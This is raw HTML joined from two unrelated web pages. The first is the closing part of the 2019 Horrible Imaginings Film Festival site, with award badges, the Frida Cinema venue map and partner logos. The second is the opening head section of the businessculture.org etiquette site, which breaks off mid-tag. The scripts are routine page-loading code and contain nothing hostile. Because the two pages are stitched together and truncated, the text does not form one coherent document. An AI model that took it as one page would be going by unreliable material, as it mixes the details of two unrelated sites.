class="sqs-gallery"> <noscript><img src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5f950b7d24bfb23c0/1548892092918/FILMFREEWAY+-+TOP+100+BEST+REVIEWED+FESTIVALS+-+2018.png" alt="FILMFREEWAY - TOP 100 BEST REVIEWED FESTIVALS - 2018.png" /></noscript><img class="thumb-image" data-src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5f950b7d24bfb23c0/1548892092918/FILMFREEWAY+-+TOP+100+BEST+REVIEWED+FESTIVALS+-+2018.png" data-image="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5f950b7d24bfb23c0/1548892092918/FILMFREEWAY+-+TOP+100+BEST+REVIEWED+FESTIVALS+-+2018.png" data-image-dimensions="1735x1152" data-image-focal-point="0.5,0.5" alt="FILMFREEWAY - TOP 100 BEST REVIEWED FESTIVALS - 2018.png" data-load="false" data-image-id="5c5237b5f950b7d24bfb23c0" data-type="image" /> <noscript><img src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5575d1f9230d38deb/1548892092279/MOVIEMAKER+MAGAZINES+-+30+BLOODY+BEST+GENRE+FESTS+IN+THE+WORLD+-+2019.png" alt="MOVIEMAKER MAGAZINES - 30 BLOODY BEST GENRE FESTS IN THE WORLD - 2019.png" /></noscript><img class="thumb-image" data-src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5575d1f9230d38deb/1548892092279/MOVIEMAKER+MAGAZINES+-+30+BLOODY+BEST+GENRE+FESTS+IN+THE+WORLD+-+2019.png" data-image="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b5575d1f9230d38deb/1548892092279/MOVIEMAKER+MAGAZINES+-+30+BLOODY+BEST+GENRE+FESTS+IN+THE+WORLD+-+2019.png" data-image-dimensions="1735x1152" data-image-focal-point="0.5,0.5" alt="MOVIEMAKER MAGAZINES - 30 BLOODY BEST GENRE FESTS IN THE WORLD - 2019.png" data-load="false" data-image-id="5c5237b5575d1f9230d38deb" data-type="image" /> <noscript><img src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b77924e85a9a1cdc95/1548892096027/MOVIEMAKER+MAGAZINES+-+TOP+50+FILM+FESTIVALS+WORTH+THE+ENTRY+FEE+-+2018.png" alt="MOVIEMAKER MAGAZINES - TOP 50 FILM FESTIVALS WORTH THE ENTRY FEE - 2018.png" /></noscript><img class="thumb-image" data-src="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b77924e85a9a1cdc95/1548892096027/MOVIEMAKER+MAGAZINES+-+TOP+50+FILM+FESTIVALS+WORTH+THE+ENTRY+FEE+-+2018.png" data-image="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/5c52195a4d7a9c817744fc39/5c5237b77924e85a9a1cdc95/1548892096027/MOVIEMAKER+MAGAZINES+-+TOP+50+FILM+FESTIVALS+WORTH+THE+ENTRY+FEE+-+2018.png" data-image-dimensions="1735x1152" data-image-focal-point="0.5,0.5" alt="MOVIEMAKER MAGAZINES - TOP 50 FILM FESTIVALS WORTH THE ENTRY FEE - 2018.png" data-load="false" data-image-id="5c5237b77924e85a9a1cdc95" data-type="image" /> </div> </div> </div></div><div class="sqs-block horizontalrule-block sqs-block-horizontalrule" data-block-type="47" id="block-yui_3_17_2_1_1548968627878_6597"><div class="sqs-block-content"><hr /></div></div><div class="sqs-block map-block sqs-block-map sized vsize-12" data-block-json="&#123;&quot;location&quot;:&#123;&quot;mapLat&quot;:33.7481559,&quot;mapLng&quot;:-117.86525260000002,&quot;mapZoom&quot;:12,&quot;markerLat&quot;:33.7481559,&quot;markerLng&quot;:-117.86525260000002,&quot;addressLine1&quot;:&quot;305 E 4th St., #100&quot;,&quot;addressLine2&quot;:&quot; Santa Ana, CA 92701&quot;,&quot;addressCountry&quot;:&quot;United States&quot;,&quot;addressTitle&quot;:&quot;The Frida Cinema&quot;&#125;,&quot;vSize&quot;:12,&quot;style&quot;:1,&quot;labels&quot;:true,&quot;terrain&quot;:false,&quot;controls&quot;:true,&quot;hSize&quot;:null,&quot;floatDir&quot;:null&#125;" data-block-type="4" id="block-yui_3_17_2_1_1548799938021_5333"><div class="sqs-block-content">&nbsp;</div></div><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-yui_3_17_2_1_1548800925574_5204"><div class="sqs-block-content"><p style="text-align:center;white-space:pre-wrap;" class="">The 2019 Horrible Imaginings Film Festival will be hosted at <a href="http://www.thefridacinema.org" target="_blank">The Frida Cinema</a> in Orange County, CA. </p><p style="text-align:center;white-space:pre-wrap;" class=""><strong>PROUD PARTNERS OF</strong>:</p></div></div><div class="sqs-block gallery-block sqs-block-gallery" data-block-json="&#123;&quot;hSize&quot;:null,&quot;floatDir&quot;:null,&quot;methodOption&quot;:&quot;transient&quot;,&quot;existingGallery&quot;:null,&quot;newWindow&quot;:false,&quot;aspect-ratio&quot;:&quot;widescreen&quot;,&quot;aspectRatio&quot;:null,&quot;auto-crop&quot;:true,&quot;blockAnimation&quot;:&quot;none&quot;,&quot;collectionId&quot;:&quot;5c65c15aeb393132a013096c&quot;,&quot;design&quot;:&quot;grid&quot;,&quot;lightbox&quot;:false,&quot;padding&quot;:0,&quot;show-meta&quot;:true,&quot;show-meta-basic&quot;:true,&quot;show-meta-only-title&quot;:false,&quot;show-meta-only-description&quot;:false,&quot;square-thumbs&quot;:false,&quot;thumbnails-per-row&quot;:4,&quot;vSize&quot;:null,&quot;transientGalleryId&quot;:&quot;5c65c15aeb393132a013096c&quot;&#125;" data-block-type="8" id="block-yui_3_17_2_1_1550170585420_6782"><div class="sqs-block-content"> <div class=" sqs-gallery-container sqs-gallery-block-grid sqs-gallery-aspect-ratio-widescreen sqs-gallery-thumbnails-per-row-4 sqs-gallery-block-show-meta block-animation-none clear" > <div class="sqs-gallery"> <div class="slide" data-type="image"> <div class="margin-wrapper"> <a class="image-slide-anchor content-fit" > <noscript><img src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172507784-AI6UG2ASRJFH5TB06QNS/ZTRoMIPUpPwdLR0Jt3A6BhELAyZ8IGjIKKZj2kDK0hgwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7evt0lqVjV6W0mrboVjJF3uNaN0Y4OrRchpvQITmP0N-zhhGklrY6WESTlW1xG25FPjtBBniPnnWf0oI0IJ8oLG/frida_logo.png" alt="frida_logo.png" /></noscript><img class="thumb-image" data-src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172507784-AI6UG2ASRJFH5TB06QNS/ZTRoMIPUpPwdLR0Jt3A6BhELAyZ8IGjIKKZj2kDK0hgwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7evt0lqVjV6W0mrboVjJF3uNaN0Y4OrRchpvQITmP0N-zhhGklrY6WESTlW1xG25FPjtBBniPnnWf0oI0IJ8oLG/frida_logo.png" data-image="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172507784-AI6UG2ASRJFH5TB06QNS/ZTRoMIPUpPwdLR0Jt3A6BhELAyZ8IGjIKKZj2kDK0hgwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7evt0lqVjV6W0mrboVjJF3uNaN0Y4OrRchpvQITmP0N-zhhGklrY6WESTlW1xG25FPjtBBniPnnWf0oI0IJ8oLG/frida_logo.png" data-image-dimensions="1292x993" data-image-focal-point="0.5,0.5" alt="frida_logo.png" data-load="false" data-image-id="5c65c15ac83025a8b242b301" data-type="image" /> </a> </div> </div> <div class="slide" data-type="image"> <div class="margin-wrapper"> <a class="image-slide-anchor content-fit" > <noscript><img src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554484489391-3X15E79Y6TU2N848AQ2B/ZTRoMIPUpPwdLR0Jt3A6BlITLZsY7FSaMmzREfUpB8D-BX2Yel6yE6gAQ0b600nHa6tB7Y7r3XOVdWkCEcEwh6-3SWpWNXpbSatuhWMkXe7sfisqjdKkjgoSKI9vOzNYYajdfFfugETO4FyP299yrsSNLVzyh98WIJKCGtAWjtk/FFA-MemberBadge_18.png" alt="FFA-MemberBadge_18.png" /></noscript><img class="thumb-image" data-src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554484489391-3X15E79Y6TU2N848AQ2B/ZTRoMIPUpPwdLR0Jt3A6BlITLZsY7FSaMmzREfUpB8D-BX2Yel6yE6gAQ0b600nHa6tB7Y7r3XOVdWkCEcEwh6-3SWpWNXpbSatuhWMkXe7sfisqjdKkjgoSKI9vOzNYYajdfFfugETO4FyP299yrsSNLVzyh98WIJKCGtAWjtk/FFA-MemberBadge_18.png" data-image="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554484489391-3X15E79Y6TU2N848AQ2B/ZTRoMIPUpPwdLR0Jt3A6BlITLZsY7FSaMmzREfUpB8D-BX2Yel6yE6gAQ0b600nHa6tB7Y7r3XOVdWkCEcEwh6-3SWpWNXpbSatuhWMkXe7sfisqjdKkjgoSKI9vOzNYYajdfFfugETO4FyP299yrsSNLVzyh98WIJKCGtAWjtk/FFA-MemberBadge_18.png" data-image-dimensions="720x413" data-image-focal-point="0.5,0.5" alt="FFA-MemberBadge_18.png" data-load="false" data-image-id="5ca78d094e17b653ebaf19a2" data-type="image" /> </a> </div> </div> <div class="slide" data-type="image"> <div class="margin-wrapper"> <a class="image-slide-anchor content-fit" > <noscript><img src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172506825-MMUKVPG4CCO7TNACNK37/ZTRoMIPUpPwdLR0Jt3A6Bj0L86dQbvRyDpY_uUb_0lkwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7cA8cc17TDySbPKbb_go71TzhYm6QHB0JjnULR-YFh1x49pWchV5XQq4JzsPkEspV_qZyIu0XSEtJCxppMvPfEF/FilmFreeway+Logo.png" alt="FilmFreeway Logo.png" /></noscript><img class="thumb-image" data-src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172506825-MMUKVPG4CCO7TNACNK37/ZTRoMIPUpPwdLR0Jt3A6Bj0L86dQbvRyDpY_uUb_0lkwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7cA8cc17TDySbPKbb_go71TzhYm6QHB0JjnULR-YFh1x49pWchV5XQq4JzsPkEspV_qZyIu0XSEtJCxppMvPfEF/FilmFreeway+Logo.png" data-image="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172506825-MMUKVPG4CCO7TNACNK37/ZTRoMIPUpPwdLR0Jt3A6Bj0L86dQbvRyDpY_uUb_0lkwuBJ-BVIgntbhh6Jch8R5ZQJf55U6aiLIf6ZK2DjrfZkG3A7SI0P5cgm2omcxI7cA8cc17TDySbPKbb_go71TzhYm6QHB0JjnULR-YFh1x49pWchV5XQq4JzsPkEspV_qZyIu0XSEtJCxppMvPfEF/FilmFreeway+Logo.png" data-image-dimensions="1933x650" data-image-focal-point="0.5,0.5" alt="FilmFreeway Logo.png" data-load="false" data-image-id="5c65c15aec212d49be9daf66" data-type="image" /> </a> </div> </div> <div class="slide" data-type="image"> <div class="margin-wrapper"> <a class="image-slide-anchor content-fit" > <noscript><img src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172509310-3YBY6OROX0NLN7FMAR9Y/ZTRoMIPUpPwdLR0Jt3A6Bl3OkXAv85ebNYv6bOgS3L3lfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJPIT-s700vS2bB2eQkkWBJm5NKaOn5vUpzAtSn26QIbDY9GNRgqUXOVLc4RZK-UPOOSpJVrjF9E6-qy98e76ndi8vf3KMoxREdU8ol6Wd3X1g/Epic+DREAD+logo.png" alt="Epic DREAD logo.png" /></noscript><img class="thumb-image" data-src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172509310-3YBY6OROX0NLN7FMAR9Y/ZTRoMIPUpPwdLR0Jt3A6Bl3OkXAv85ebNYv6bOgS3L3lfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJPIT-s700vS2bB2eQkkWBJm5NKaOn5vUpzAtSn26QIbDY9GNRgqUXOVLc4RZK-UPOOSpJVrjF9E6-qy98e76ndi8vf3KMoxREdU8ol6Wd3X1g/Epic+DREAD+logo.png" data-image="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1550172509310-3YBY6OROX0NLN7FMAR9Y/ZTRoMIPUpPwdLR0Jt3A6Bl3OkXAv85ebNYv6bOgS3L3lfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJPIT-s700vS2bB2eQkkWBJm5NKaOn5vUpzAtSn26QIbDY9GNRgqUXOVLc4RZK-UPOOSpJVrjF9E6-qy98e76ndi8vf3KMoxREdU8ol6Wd3X1g/Epic+DREAD+logo.png" data-image-dimensions="2500x2083" data-image-focal-point="0.5,0.5" alt="Epic DREAD logo.png" data-load="false" data-image-id="5c65c15a652dea5870358c1e" data-type="image" /> </a> </div> </div> </div> </div> <style type="text/css" id="design-grid-css"> #block-yui_3_17_2_1_1550170585420_6782 .sqs-gallery-block-grid .sqs-gallery-design-grid { margin-right: -0px; } #block-yui_3_17_2_1_1550170585420_6782 .sqs-gallery-block-grid .sqs-gallery-design-grid-slide .margin-wrapper { margin-right: 0px; margin-bottom: 0px; } </style> </div></div></div></div></div> </section> </div><!-- / pageWrapper --> <div id="footerWrapper"> <footer id="footer"> <div id="sqs-social" class="social-links sqs-svg-icon--list" data-content-field="connected-accounts"> <a href="http://instagram.com/hifilmfest" target="_blank" class="sqs-svg-icon--wrapper instagram"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#instagram-icon"></use> <use class="sqs-use--mask" xlink:href="#instagram-mask"></use> </svg> </div> </a> <a href="https://www.facebook.com/HorribleImaginings/" target="_blank" class="sqs-svg-icon--wrapper facebook"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#facebook-icon"></use> <use class="sqs-use--mask" xlink:href="#facebook-mask"></use> </svg> </div> </a> <a href="https://twitter.com/HIFilmFest" target="_blank" class="sqs-svg-icon--wrapper twitter"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#twitter-icon"></use> <use class="sqs-use--mask" xlink:href="#twitter-mask"></use> </svg> </div> </a> </div> <div class="sqs-layout sqs-grid-12 columns-12" data-layout-label="Footer Content" data-type="block-field" data-updated-on="1548800490376" id="footerBlock"><div class="row sqs-row"><div class="col sqs-col-12 span-12"><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-yui_3_17_2_1_1548800239849_5052"><div class="sqs-block-content"><p style="text-align:center;white-space:pre-wrap;"><strong>© 2019 Horrible Imaginings Film Festival</strong></p></div></div></div></div></div> </footer> </div><!-- / footerWrapper --> </div><!-- / canvas --> </div><!-- / site --> <script type="text/javascript" data-sqs-type="imageloader-bootstrapper">(function() {if(window.ImageLoader) { window.ImageLoader.bootstrap({}, document); }})();</script><script>Squarespace.afterBodyLoad(Y);</script><svg xmlns="http://www.w3.org/2000/svg" version="1.1" style="display:none"><symbol id="instagram-icon" viewBox="0 0 64 64"><path d="M46.91,25.816c-0.073-1.597-0.326-2.687-0.697-3.641c-0.383-0.986-0.896-1.823-1.73-2.657c-0.834-0.834-1.67-1.347-2.657-1.73c-0.954-0.371-2.045-0.624-3.641-0.697C36.585,17.017,36.074,17,32,17s-4.585,0.017-6.184,0.09c-1.597,0.073-2.687,0.326-3.641,0.697c-0.986,0.383-1.823,0.896-2.657,1.73c-0.834,0.834-1.347,1.67-1.73,2.657c-0.371,0.954-0.624,2.045-0.697,3.641C17.017,27.415,17,27.926,17,32c0,4.074,0.017,4.585,0.09,6.184c0.073,1.597,0.326,2.687,0.697,3.641c0.383,0.986,0.896,1.823,1.73,2.657c0.834,0.834,1.67,1.347,2.657,1.73c0.954,0.371,2.045,0.624,3.641,0.697C27.415,46.983,27.926,47,32,47s4.585-0.017,6.184-0.09c1.597-0.073,2.687-0.326,3.641-0.697c0.986-0.383,1.823-0.896,2.657-1.73c0.834-0.834,1.347-1.67,1.73-2.657c0.371-0.954,0.624-2.045,0.697-3.641C46.983,36.585,47,36.074,47,32S46.983,27.415,46.91,25.816z M44.21,38.061c-0.067,1.462-0.311,2.257-0.516,2.785c-0.272,0.7-0.597,1.2-1.122,1.725c-0.525,0.525-1.025,0.85-1.725,1.122c-0.529,0.205-1.323,0.45-2.785,0.516c-1.581,0.072-2.056,0.087-6.061,0.087s-4.48-0.015-6.061-0.087c-1.462-0.067-2.257-0.311-2.785-0.516c-0.7-0.272-1.2-0.597-1.725-1.122c-0.525-0.525-0.85-1.025-1.122-1.725c-0.205-0.529-0.45-1.323-0.516-2.785c-0.072-1.582-0.087-2.056-0.087-6.061s0.015-4.48,0.087-6.061c0.067-1.462,0.311-2.257,0.516-2.785c0.272-0.7,0.597-1.2,1.122-1.725c0.525-0.525,1.025-0.85,1.725-1.122c0.529-0.205,1.323-0.45,2.785-0.516c1.582-0.072,2.056-0.087,6.061-0.087s4.48,0.015,6.061,0.087c1.462,0.067,2.257,0.311,2.785,0.516c0.7,0.272,1.2,0.597,1.725,1.122c0.525,0.525,0.85,1.025,1.122,1.725c0.205,0.529,0.45,1.323,0.516,2.785c0.072,1.582,0.087,2.056,0.087,6.061S44.282,36.48,44.21,38.061z M32,24.297c-4.254,0-7.703,3.449-7.703,7.703c0,4.254,3.449,7.703,7.703,7.703c4.254,0,7.703-3.449,7.703-7.703C39.703,27.746,36.254,24.297,32,24.297z M32,37c-2.761,0-5-2.239-5-5c0-2.761,2.239-5,5-5s5,2.239,5,5C37,34.761,34.761,37,32,37z M40.007,22.193c-0.994,0-1.8,0.806-1.8,1.8c0,0.994,0.806,1.8,1.8,1.8c0.994,0,1.8-0.806,1.8-1.8C41.807,22.999,41.001,22.193,40.007,22.193z"/></symbol><symbol id="instagram-mask" viewBox="0 0 64 64"><path d="M43.693,23.153c-0.272-0.7-0.597-1.2-1.122-1.725c-0.525-0.525-1.025-0.85-1.725-1.122c-0.529-0.205-1.323-0.45-2.785-0.517c-1.582-0.072-2.056-0.087-6.061-0.087s-4.48,0.015-6.061,0.087c-1.462,0.067-2.257,0.311-2.785,0.517c-0.7,0.272-1.2,0.597-1.725,1.122c-0.525,0.525-0.85,1.025-1.122,1.725c-0.205,0.529-0.45,1.323-0.516,2.785c-0.072,1.582-0.087,2.056-0.087,6.061s0.015,4.48,0.087,6.061c0.067,1.462,0.311,2.257,0.516,2.785c0.272,0.7,0.597,1.2,1.122,1.725s1.025,0.85,1.725,1.122c0.529,0.205,1.323,0.45,2.785,0.516c1.581,0.072,2.056,0.087,6.061,0.087s4.48-0.015,6.061-0.087c1.462-0.067,2.257-0.311,2.785-0.516c0.7-0.272,1.2-0.597,1.725-1.122s0.85-1.025,1.122-1.725c0.205-0.529,0.45-1.323,0.516-2.785c0.072-1.582,0.087-2.056,0.087-6.061s-0.015-4.48-0.087-6.061C44.143,24.476,43.899,23.682,43.693,23.153z M32,39.703c-4.254,0-7.703-3.449-7.703-7.703s3.449-7.703,7.703-7.703s7.703,3.449,7.703,7.703S36.254,39.703,32,39.703z M40.007,25.793c-0.994,0-1.8-0.806-1.8-1.8c0-0.994,0.806-1.8,1.8-1.8c0.994,0,1.8,0.806,1.8,1.8C41.807,24.987,41.001,25.793,40.007,25.793z M0,0v64h64V0H0z M46.91,38.184c-0.073,1.597-0.326,2.687-0.697,3.641c-0.383,0.986-0.896,1.823-1.73,2.657c-0.834,0.834-1.67,1.347-2.657,1.73c-0.954,0.371-2.044,0.624-3.641,0.697C36.585,46.983,36.074,47,32,47s-4.585-0.017-6.184-0.09c-1.597-0.073-2.687-0.326-3.641-0.697c-0.986-0.383-1.823-0.896-2.657-1.73c-0.834-0.834-1.347-1.67-1.73-2.657c-0.371-0.954-0.624-2.044-0.697-3.641C17.017,36.585,17,36.074,17,32c0-4.074,0.017-4.585,0.09-6.185c0.073-1.597,0.326-2.687,0.697-3.641c0.383-0.986,0.896-1.823,1.73-2.657c0.834-0.834,1.67-1.347,2.657-1.73c0.954-0.371,2.045-0.624,3.641-0.697C27.415,17.017,27.926,17,32,17s4.585,0.017,6.184,0.09c1.597,0.073,2.687,0.326,3.641,0.697c0.986,0.383,1.823,0.896,2.657,1.73c0.834,0.834,1.347,1.67,1.73,2.657c0.371,0.954,0.624,2.044,0.697,3.641C46.983,27.415,47,27.926,47,32C47,36.074,46.983,36.585,46.91,38.184z M32,27c-2.761,0-5,2.239-5,5s2.239,5,5,5s5-2.239,5-5S34.761,27,32,27z"/></symbol><symbol id="facebook-icon" viewBox="0 0 64 64"><path d="M34.1,47V33.3h4.6l0.7-5.3h-5.3v-3.4c0-1.5,0.4-2.6,2.6-2.6l2.8,0v-4.8c-0.5-0.1-2.2-0.2-4.1-0.2 c-4.1,0-6.9,2.5-6.9,7V28H24v5.3h4.6V47H34.1z"/></symbol><symbol id="facebook-mask" viewBox="0 0 64 64"><path d="M0,0v64h64V0H0z M39.6,22l-2.8,0c-2.2,0-2.6,1.1-2.6,2.6V28h5.3l-0.7,5.3h-4.6V47h-5.5V33.3H24V28h4.6V24 c0-4.6,2.8-7,6.9-7c2,0,3.6,0.1,4.1,0.2V22z"/></symbol><symbol id="twitter-icon" viewBox="0 0 64 64"><path d="M48,22.1c-1.2,0.5-2.4,0.9-3.8,1c1.4-0.8,2.4-2.1,2.9-3.6c-1.3,0.8-2.7,1.3-4.2,1.6 C41.7,19.8,40,19,38.2,19c-3.6,0-6.6,2.9-6.6,6.6c0,0.5,0.1,1,0.2,1.5c-5.5-0.3-10.3-2.9-13.5-6.9c-0.6,1-0.9,2.1-0.9,3.3 c0,2.3,1.2,4.3,2.9,5.5c-1.1,0-2.1-0.3-3-0.8c0,0,0,0.1,0,0.1c0,3.2,2.3,5.8,5.3,6.4c-0.6,0.1-1.1,0.2-1.7,0.2c-0.4,0-0.8,0-1.2-0.1 c0.8,2.6,3.3,4.5,6.1,4.6c-2.2,1.8-5.1,2.8-8.2,2.8c-0.5,0-1.1,0-1.6-0.1c2.9,1.9,6.4,2.9,10.1,2.9c12.1,0,18.7-10,18.7-18.7 c0-0.3,0-0.6,0-0.8C46,24.5,47.1,23.4,48,22.1z"/></symbol><symbol id="twitter-mask" viewBox="0 0 64 64"><path d="M0,0v64h64V0H0z M44.7,25.5c0,0.3,0,0.6,0,0.8C44.7,35,38.1,45,26.1,45c-3.7,0-7.2-1.1-10.1-2.9 c0.5,0.1,1,0.1,1.6,0.1c3.1,0,5.9-1,8.2-2.8c-2.9-0.1-5.3-2-6.1-4.6c0.4,0.1,0.8,0.1,1.2,0.1c0.6,0,1.2-0.1,1.7-0.2 c-3-0.6-5.3-3.3-5.3-6.4c0,0,0-0.1,0-0.1c0.9,0.5,1.9,0.8,3,0.8c-1.8-1.2-2.9-3.2-2.9-5.5c0-1.2,0.3-2.3,0.9-3.3 c3.2,4,8.1,6.6,13.5,6.9c-0.1-0.5-0.2-1-0.2-1.5c0-3.6,2.9-6.6,6.6-6.6c1.9,0,3.6,0.8,4.8,2.1c1.5-0.3,2.9-0.8,4.2-1.6 c-0.5,1.5-1.5,2.8-2.9,3.6c1.3-0.2,2.6-0.5,3.8-1C47.1,23.4,46,24.5,44.7,25.5z"/></symbol></svg> <script type="text/javascript" src="https://static1.squarespace.com/static/ta/4f6798afe4b097349e410d49/1593/scripts/combo/?site.js"></script> </body> </html>
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-GB"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-GB"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-GB"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>International business culture in Europe: Business Etiquette guides</title> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="https://businessculture.org/xmlrpc.php"> <!--[if lt IE 9]> <script src="https://businessculture.org/wp-content/themes/twentythirteen/js/html5.js"></script> <![endif]--> <!-- This site is optimized with the Yoast SEO plugin v9.4 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Business Culture offers free international business and cultural awareness guides for 31 European countries including business etiquette &amp; netiquette"/> <link rel="canonical" href="https://businessculture.org/" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Business Culture offers free international business and cultural awareness guides for 31 European countries including business etiquette &amp; netiquette" /> <meta name="twitter:title" content="International business culture in Europe: Business Etiquette guides" /> <meta name="twitter:site" content="@AleksejHeinze" /> <meta name="twitter:image" content="https://businessculture.org/wp-content/themes/shell-lite/images/default-logo.png" /> <meta name="twitter:creator" content="@AleksejHeinze" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://businessculture.org/#website","url":"https://businessculture.org/","name":"Business Culture","potentialAction":{"@type":"SearchAction","target":"https://businessculture.org/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="fLgbEubZgrMVx4D3yesiE2A_9-rkCZ28_tS8lVmIfc8" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Business Culture &raquo; Feed" href="https://businessculture.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Business Culture &raquo; Comments Feed" href="https://businessculture.org/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/businessculture.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.3"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://businessculture.org/wp-includes/css/dist/block-library/style.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-theme-css' href='https://businessculture.org/wp-includes/css/dist/block-library/theme.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='langbf_style-css' href='https://businessculture.org/wp-content/plugins/language-bar-flags/style.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='twentythirteen-fonts-css' href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A300%2C400%2C700%2C300italic%2C400italic%2C700italic%7CBitter%3A400%2C700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' 